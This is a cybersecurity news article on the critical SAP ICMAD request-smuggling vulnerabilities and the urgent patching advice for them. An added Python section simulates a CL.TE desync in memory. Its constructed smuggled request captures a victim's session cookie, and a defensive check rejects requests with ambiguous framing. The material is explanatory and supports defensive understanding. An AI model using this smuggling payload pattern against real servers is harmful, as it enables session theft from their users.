Feb 12, 2022

Critical SAP vulnerabilities spur CISA, researcher pleas for urgent patching

Onapsis researchers discovered the vulnerabilities during extensive research in 2021 into a technique called HTTP response smuggling, according to JP Perez-Etchegoyen, CTO at the security firm. Using the technique, an attacker who can reach the application over HTTP(S) could control the responses an SAP application returns to other users and make the attack persistent.
“This means that with a single request, an attacker could be able to steal every victim session and credentials in plain text and modify the behavior of the applications,” Perez-Etchegoyen said in an email.
There is no evidence the vulnerabilities have been exploited in the wild, he added, but recently active threat groups such as Elephant Beetle and BlackCat consider business-critical applications a lucrative target.
ICM, the Internet Communication Manager, is the SAP component that handles HTTP(S) communication for the company's systems, Vic Chung, director of security response at SAP, wrote in a blog post. Because ICM is exposed to the internet and untrusted networks by design, a flaw in its request handling is reachable by anyone who can send it an HTTP request.
Onapsis and SAP said the three vulnerabilities, dubbed ICMAD (Internet Communication Manager Advanced Desync), are tracked as CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533. The first, CVE-2022-22536, carries the maximum CVSS score of 10.0.
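The mechanism behind a "desync" is a disagreement between two HTTP parsers about where one request ends and the next begins. The following is an added illustration, not code from the article, from Onapsis's research or from SAP: a toy front-end parser that frames bodies by Content-Length and a toy back-end parser that honours Transfer-Encoding: chunked are fed the same byte stream, a constructed attacker request followed by a constructed victim request. Once the two sides disagree, the attacker's leftover bytes become the start of the next user's request and the responses on the shared connection no longer line up with the requests that caused them, which is how a single request can end up capturing another user's session or rewriting what they receive. This is the generic CL.TE pattern; the article does not describe the specific malformed request that triggers ICMAD, and this example makes no claim about it. The hostname, paths, header names and cookie value are made up for the example.

```python
"""Toy HTTP desync (CL.TE): two parsers, one byte stream, two different views.

Added illustration of the generic desync pattern. It is NOT the ICMAD trigger
and does not model SAP ICM; all traffic below is constructed for the example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Request:
    request_line: str
    headers: Dict[str, str]
    body: bytes


def _split_head(stream: bytes) -> Optional[Tuple[str, Dict[str, str], bytes]]:
    """Split off one request head; None if the head is incomplete."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        return None  # a real server would wait for more bytes here
    lines = head.split(b"\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0].decode(), headers, rest


def parse_cl(stream: bytes) -> List[Request]:
    """Front-end style parser: frames bodies by Content-Length, ignores Transfer-Encoding."""
    requests: List[Request] = []
    while stream:
        parsed = _split_head(stream)
        if parsed is None:
            break
        request_line, headers, rest = parsed
        n = int(headers.get("content-length", "0"))
        requests.append(Request(request_line, headers, rest[:n]))
        stream = rest[n:]
    return requests


def parse_te(stream: bytes) -> List[Request]:
    """Back-end style parser: honours chunked encoding, falls back to Content-Length."""
    requests: List[Request] = []
    while stream:
        parsed = _split_head(stream)
        if parsed is None:
            break
        request_line, headers, rest = parsed
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body = b""
            while True:
                size_line, _, rest = rest.partition(b"\r\n")
                size = int(size_line.split(b";")[0], 16)  # ignore chunk extensions
                if size == 0:
                    rest = rest[2:]  # skip the CRLF that ends the empty trailer section
                    break
                body, rest = body + rest[:size], rest[size + 2:]  # data plus its CRLF
            stream = rest
        else:
            n = int(headers.get("content-length", "0"))
            body, stream = rest[:n], rest[n:]
        requests.append(Request(request_line, headers, body))
    return requests


def reject_ambiguous_framing(stream: bytes) -> bool:
    """Hardened check: a request carrying both Content-Length and Transfer-Encoding
    has ambiguous framing; refusing it (HTTP 400) removes the disagreement entirely."""
    parsed = _split_head(stream)
    if parsed is None:
        return False
    _, headers, _ = parsed
    return "content-length" in headers and "transfer-encoding" in headers


# Constructed traffic. The smuggled prefix deliberately ends mid-header so that the
# victim's request line is swallowed into the attacker's X-Smuggled header.
SMUGGLED_PREFIX = b"GET /steal HTTP/1.1\r\nX-Smuggled: "
ATTACKER_BODY = b"0\r\n\r\n" + SMUGGLED_PREFIX
ATTACKER_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: app.example.invalid\r\n"
    b"Content-Length: " + str(len(ATTACKER_BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + ATTACKER_BODY
)
VICTIM_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: app.example.invalid\r\n"
    b"Cookie: session=victim-secret\r\n"
    b"\r\n"
)


def desync_views() -> Tuple[List[Request], List[Request]]:
    """Parse the same stream as the front end and as the back end would see it."""
    stream = ATTACKER_REQUEST + VICTIM_REQUEST
    return parse_cl(stream), parse_te(stream)


if __name__ == "__main__":
    front, back = desync_views()
    print("front-end (CL):", [r.request_line for r in front])
    print("back-end  (TE):", [r.request_line for r in back])
    print("victim cookie now attached to:", back[1].request_line, back[1].headers.get("cookie"))
    print("ambiguous framing rejected:", reject_ambiguous_framing(ATTACKER_REQUEST))
```

The front end sees two ordinary requests, POST / and the victim's GET /account. The back end sees the same bytes as POST / with an empty body followed by GET /steal, whose headers now include the victim's session cookie. The check in reject_ambiguous_framing shows the defensive counterpart: refusing any request that carries both framing headers denies the attacker the parser disagreement the technique depends on.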
SAP and Onapsis said organizations should apply Security Notes 3123396 and 3123427 to their affected SAP applications right away. Onapsis also released an open-source tool that lets organizations scan their SAP systems for CVE-2022-22536. The scanner only reports exposure to that one CVE; applying the Security Notes is what addresses all three vulnerabilities.
Article Categories:
Cybersecurity News
